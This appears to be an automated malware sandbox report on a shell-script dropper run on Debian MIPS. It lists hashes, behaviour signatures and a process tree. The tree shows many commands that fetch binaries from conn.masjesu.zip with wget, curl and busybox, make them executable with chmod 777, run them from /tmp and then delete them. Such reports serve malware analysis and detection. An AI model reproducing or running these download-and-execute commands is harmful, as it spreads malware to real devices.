Analysis
-
max time kernel
120s -
max time network
118s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
-
Size
10KB
-
MD5
212b02f29854addd09c83c096b0a28d8
-
SHA1
6d3e25cbd8a8331cfec87e951c697876d1ce21c5
-
SHA256
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788
-
SHA512
8ae72b9af1d4e17bda84c690db9c365158e62d7dcf4dae5a7f42a9edf5f1faae4b8955062fcadd5a6f40c68045060f91734e883bd234aa98d078149be0382a85
-
SSDEEP
192:bZR+7fUY+OQy21N8fzFNEZR+7f2Y8D1N8fz8:7OQyPNAV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 787 chmod 834 chmod 841 chmod 960 chmod 995 chmod 848 chmod 953 chmod 1002 chmod 890 chmod 918 chmod 967 chmod 988 chmod 939 chmod 876 chmod 883 chmod 897 chmod 911 chmod 925 chmod 974 chmod 735 chmod 862 chmod 869 chmod 904 chmod 932 chmod 797 chmod 855 chmod 946 chmod 981 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 736 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 788 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 799 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 835 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 842 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 849 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 856 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 863 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 870 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 877 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 884 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 891 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 898 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 905 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 912 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 919 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 926 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 933 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 940 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 947 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 954 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 961 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 968 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 975 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 982 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 989 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 996 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 1003 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 819 curl 828 busybox 838 curl 859 curl 922 curl 709 wget 991 wget 992 curl 1001 busybox 882 busybox 879 wget 896 busybox 929 curl 984 wget 844 wget 837 wget 861 busybox 889 busybox 942 wget 945 busybox 959 busybox 971 curl 786 busybox 973 busybox 868 busybox 886 wget 980 busybox 994 busybox 734 busybox 854 busybox 858 wget 952 busybox 966 busybox 998 wget 793 busybox 977 wget 964 curl 921 wget 924 busybox 943 curl 950 curl 875 busybox 936 curl 970 wget 987 busybox 880 curl 914 wget 928 wget 865 wget 738 wget 851 wget 873 curl 730 curl 866 curl 893 wget 949 wget 847 busybox 908 curl 938 busybox 978 curl 803 wget 791 curl 903 busybox 910 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl
Processes
-
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:786
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:793
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:840
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:843
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:844
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:850
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:851
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:857
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:858
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:917
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:931
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:940
-
-
